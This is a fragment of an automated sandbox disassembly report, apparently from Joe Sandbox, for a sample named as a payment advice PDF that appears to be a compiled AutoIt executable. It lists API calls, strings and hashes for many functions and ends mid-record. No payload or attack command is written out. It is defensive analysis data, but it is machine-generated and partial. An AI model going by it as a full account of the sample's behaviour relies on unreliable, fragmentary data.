                                                              • Instruction Fuzzy Hash: AC8136702083419FE714CF28D894E6BBBF9FB88714F00892EFA99D6291D730D905CB92
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 008B738F
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008B739B
                                                              • CreateCompatibleDC.GDI32(?), ref: 008B73A7
                                                              • SelectObject.GDI32(00000000,?), ref: 008B73B4
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008B7408
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008B7444
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008B7468
                                                              • SelectObject.GDI32(00000006,?), ref: 008B7470
                                                              • DeleteObject.GDI32(?), ref: 008B7479
                                                              • DeleteDC.GDI32(00000006), ref: 008B7480
                                                              • ReleaseDC.USER32(00000000,?), ref: 008B748B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 7e73d68b5ab02c8456a5e26267b70280a575fe7a31e0661247fbcea80e58fd11
                                                              • Instruction ID: 0ea0885312d41933ba0ccc1b9211a29bd0315b560478adbdcd6f9f310e183fd6
                                                              • Opcode Fuzzy Hash: 7e73d68b5ab02c8456a5e26267b70280a575fe7a31e0661247fbcea80e58fd11
                                                              • Instruction Fuzzy Hash: AE512775904309AFDB15CFA8CC85EAEBBB9FF88710F148529EA99D7311C731A9408B50
                                                              APIs
                                                                • Part of subcall function 00860957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00846B0C,?,00008000), ref: 00860973
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00846BAD
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00846CFA
                                                                • Part of subcall function 0084586D: _wcscpy.LIBCMT ref: 008458A5
                                                                • Part of subcall function 0086363D: _iswctype.LIBCMT ref: 00863645
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 537147316-1018226102
                                                              • Opcode ID: 62c4fa832b6be0c10f97870f0d18bee4e8de559e4b03ee2d6ef74780780bff4a
                                                              • Instruction ID: 3ad62c68aa535610be3ab29bb35ec57e2dc53c665c65136a4fc95caed8240d59
                                                              • Opcode Fuzzy Hash: 62c4fa832b6be0c10f97870f0d18bee4e8de559e4b03ee2d6ef74780780bff4a
                                                              • Instruction Fuzzy Hash: 9D0258305083489BC714EF28C881AAFBBE5FF99314F14491DF59AD62A2DB31D949CB53
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2D50
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 008A2DDD
                                                              • GetMenuItemCount.USER32(00905890), ref: 008A2E66
                                                              • DeleteMenu.USER32(00905890,00000005,00000000,000000F5,?,?), ref: 008A2EF6
                                                              • DeleteMenu.USER32(00905890,00000004,00000000), ref: 008A2EFE
                                                              • DeleteMenu.USER32(00905890,00000006,00000000), ref: 008A2F06
                                                              • DeleteMenu.USER32(00905890,00000003,00000000), ref: 008A2F0E
                                                              • GetMenuItemCount.USER32(00905890), ref: 008A2F16
                                                              • SetMenuItemInfoW.USER32(00905890,00000004,00000000,00000030), ref: 008A2F4C
                                                              • GetCursorPos.USER32(?), ref: 008A2F56
                                                              • SetForegroundWindow.USER32(00000000), ref: 008A2F5F
                                                              • TrackPopupMenuEx.USER32(00905890,00000000,?,00000000,00000000,00000000), ref: 008A2F72
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008A2F7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: 40ca235e212ae4ff73fe5eabed75be763cd2da28610ae26cc4bfd8963ea666a6
                                                              • Instruction ID: 0f1a021a854490338a914be88a3c4a33f359e365e249307c34c2c5ae5349be21
                                                              • Opcode Fuzzy Hash: 40ca235e212ae4ff73fe5eabed75be763cd2da28610ae26cc4bfd8963ea666a6
                                                              • Instruction Fuzzy Hash: 9171B070604209BEFB318F5CDC45FAABF65FB06364F100216F625E65E2CBB16860DB91
                                                              APIs
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • _memset.LIBCMT ref: 0089786B
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008978A0
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008978BC
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008978D8
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00897902
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0089792A
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00897935
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0089793A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1411258926-22481851
                                                              • Opcode ID: d809a87099825c1693778f9f843c6d07d727f78d042ea62840db293b716ca827
                                                              • Instruction ID: 4b6c9978d20bc9bb6767a18ccc662aa9cb214992a62b2abd092d71b42ee5b419
                                                              • Opcode Fuzzy Hash: d809a87099825c1693778f9f843c6d07d727f78d042ea62840db293b716ca827
                                                              • Instruction Fuzzy Hash: 9841F57282462DABDF11EBA8DC85DEDBB79FF14710B044069E915E3262EB345E04CB91
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,008BFDAD,?,?), ref: 008C0E31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: 729d6cfbd4ebeb33bab1e038814593ddb1754357ab715a71339031cc1d7e790c
                                                              • Instruction ID: ba84291cbcf6e019fae2cfb70d09a44417f1c36268f8466233f1cc7b870d0a4f
                                                              • Opcode Fuzzy Hash: 729d6cfbd4ebeb33bab1e038814593ddb1754357ab715a71339031cc1d7e790c
                                                              • Instruction Fuzzy Hash: 6141343111025A8BCF10EEA8E851BEF3764FF21384F150458F9959B6A2DB30D99ADFA1
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0087E2A0,00000010,?,Bad directive syntax error,008CF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0089F7C2
                                                              • LoadStringW.USER32(00000000,?,0087E2A0,00000010), ref: 0089F7C9
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • _wprintf.LIBCMT ref: 0089F7FC
                                                              • __swprintf.LIBCMT ref: 0089F81E
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0089F88D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1506413516-4153970271
                                                              • Opcode ID: 4a3c7dcc714cbd578ad8a8bad67333c1d2d7a66e85b77c859e267bb2ff53ebc0
                                                              • Instruction ID: 951427bc4c0bd5079645a0551f47b105125b0bede738d2e410772efeec0a5334
                                                              • Opcode Fuzzy Hash: 4a3c7dcc714cbd578ad8a8bad67333c1d2d7a66e85b77c859e267bb2ff53ebc0
                                                              • Instruction Fuzzy Hash: 25213E3290021EEBDF11AFA4CC4AEEE7739FF18300F044465F615E61A2EA75A658DB51
                                                              APIs
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                                • Part of subcall function 00847924: _memmove.LIBCMT ref: 008479AD
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008A5330
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008A5346
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008A5357
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008A5369
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008A537A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: SendString$_memmove
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 2279737902-1007645807
                                                              • Opcode ID: a5449dd0251e0980f44750608191bbf1f030e6d87eb3fd2bdf009245de5414bf
                                                              • Instruction ID: ca6764fbbe23c6b5f7b13a829e6b3da8114d50d51fde6b043628b9f5a9f5619d
                                                              • Opcode Fuzzy Hash: a5449dd0251e0980f44750608191bbf1f030e6d87eb3fd2bdf009245de5414bf
                                                              • Instruction Fuzzy Hash: 2F11632195015DB9DB20B675DC49EFFAABCFBE2B44F0004197511D21D1EEA41944C5A1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 208665112-3771769585
                                                              • Opcode ID: d26124fdc308318afeed10dabafcd9419185766cd436b8773b841c47163e9a33
                                                              • Instruction ID: 20619a7c060b4ad430cd3c73c9a58f826c0ee87654d9051e66193210003896c0
                                                              • Opcode Fuzzy Hash: d26124fdc308318afeed10dabafcd9419185766cd436b8773b841c47163e9a33
                                                              • Instruction Fuzzy Hash: 7211D23150011CAFEF20AB349C4AEEA77BDFB42711F0441BAF545D61A2EFB58A818A51
                                                              APIs
                                                              • timeGetTime.WINMM ref: 008A4F7A
                                                                • Part of subcall function 0086049F: timeGetTime.WINMM(?,75A4B400,00850E7B), ref: 008604A3
                                                              • Sleep.KERNEL32(0000000A), ref: 008A4FA6
                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 008A4FCA
                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008A4FEC
                                                              • SetActiveWindow.USER32 ref: 008A500B
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008A5019
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 008A5038
                                                              • Sleep.KERNEL32(000000FA), ref: 008A5043
                                                              • IsWindow.USER32 ref: 008A504F
                                                              • EndDialog.USER32(00000000), ref: 008A5060
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: c1c3716e9b32da39e4781ca04c2db057b75db23e6f228ee22a185aed2fae157d
                                                              • Instruction ID: 7236eb3a47191251084744c5381f84aaa0568ed55c06e3e58a8023ec7f265376
                                                              • Opcode Fuzzy Hash: c1c3716e9b32da39e4781ca04c2db057b75db23e6f228ee22a185aed2fae157d
                                                              • Instruction Fuzzy Hash: A7218470208605AFF7115F74EC89E263BBEFB56745F052025F201C5AB2DBB14D50EA62
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • CoInitialize.OLE32(00000000), ref: 008AD5EA
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008AD67D
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 008AD691
                                                              • CoCreateInstance.OLE32(008D2D7C,00000000,00000001,008F8C1C,?), ref: 008AD6DD
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008AD74C
                                                              • CoTaskMemFree.OLE32(?,?), ref: 008AD7A4
                                                              • _memset.LIBCMT ref: 008AD7E1
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 008AD81D
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008AD840
                                                              • CoTaskMemFree.OLE32(00000000), ref: 008AD847
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008AD87E
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 008AD880
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 1e5b2b464ff097ed288625a759663486bee865dfe3b32d8d90e12e899ec738ba
                                                              • Instruction ID: 0dc63329c395fe2190e5946e494f09d5dc2faf0866e023836cfd9a2167f97a1e
                                                              • Opcode Fuzzy Hash: 1e5b2b464ff097ed288625a759663486bee865dfe3b32d8d90e12e899ec738ba
                                                              • Instruction Fuzzy Hash: F3B11D75A00209AFDB14DFA8C884DAEBBB9FF49314F048469F90ADB661DB30ED41CB51
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0089C283
                                                              • GetWindowRect.USER32(00000000,?), ref: 0089C295
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0089C2F3
                                                              • GetDlgItem.USER32(?,00000002), ref: 0089C2FE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0089C310
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0089C364
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0089C372
                                                              • GetWindowRect.USER32(00000000,?), ref: 0089C383
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0089C3C6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0089C3D4
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0089C3F1
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0089C3FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: 066d4651e6439ff914acbef1d0af480199e093688eaa2e5122f38c19201f7a97
                                                              • Instruction ID: eebc017d0c993e15a60ffb1a0edbabbe4998a3a61463b6c5c1df39f97e773176
                                                              • Opcode Fuzzy Hash: 066d4651e6439ff914acbef1d0af480199e093688eaa2e5122f38c19201f7a97
                                                              • Instruction Fuzzy Hash: C1514D71B00205ABEF18DFA9DD99EAEBBBAFB98310F14812DF615D7291D7719D008B10
                                                              APIs
                                                                • Part of subcall function 00841B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00842036,?,00000000,?,?,?,?,008416CB,00000000,?), ref: 00841B9A
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008420D3
                                                              • KillTimer.USER32(-00000001,?,?,?,?,008416CB,00000000,?,?,00841AE2,?,?), ref: 0084216E
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0087BCA6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008416CB,00000000,?,?,00841AE2,?,?), ref: 0087BCD7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008416CB,00000000,?,?,00841AE2,?,?), ref: 0087BCEE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008416CB,00000000,?,?,00841AE2,?,?), ref: 0087BD0A
                                                              • DeleteObject.GDI32(00000000), ref: 0087BD1C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: d45d663ed7650afe055959da1bbcb4a243f9355e393d78c10d4249ef4d1a56cc
                                                              • Instruction ID: 7a33432ce773236ef4481ea72f94c59025402e20b7a01b703d092f8be2dc6351
                                                              • Opcode Fuzzy Hash: d45d663ed7650afe055959da1bbcb4a243f9355e393d78c10d4249ef4d1a56cc
                                                              • Instruction Fuzzy Hash: 0E619931118A08DFDB359F18D948B2ABBF2FF50316F918428E946CB965C770A880EF91
                                                              APIs
                                                                • Part of subcall function 008425DB: GetWindowLongW.USER32(?,000000EB), ref: 008425EC
                                                              • GetSysColor.USER32(0000000F), ref: 008421D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: adc4078527ed04396bd743419c128430f70d10e153c3d9cc29590ecfbcef0356
                                                              • Instruction ID: f5718004bfef19681ba3c6f87773b16cc873496aabdc2be9c045b81ae17501ae
                                                              • Opcode Fuzzy Hash: adc4078527ed04396bd743419c128430f70d10e153c3d9cc29590ecfbcef0356
                                                              • Instruction Fuzzy Hash: 4C41A331008568DFEB215F28EC88BB97B66FB06331F584265FE65CA1E6C7718C41DB21
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,008CF910), ref: 008AA90B
                                                              • GetDriveTypeW.KERNEL32(00000061,008F89A0,00000061), ref: 008AA9D5
                                                              • _wcscpy.LIBCMT ref: 008AA9FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: 70a1b18fe17d97b33fc8476c578c9c54843feb0c4f170450f1fcb47128d17d90
                                                              • Instruction ID: 76280c56d6ac58f22b5c88f399578b15a3e00f0bfc4674424690b7398dc14916
                                                              • Opcode Fuzzy Hash: 70a1b18fe17d97b33fc8476c578c9c54843feb0c4f170450f1fcb47128d17d90
                                                              • Instruction Fuzzy Hash: 8E51CD312083049BD714EF18C892AAFBBE9FF85344F05482DF5A5D7AA2DB719909CA53
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
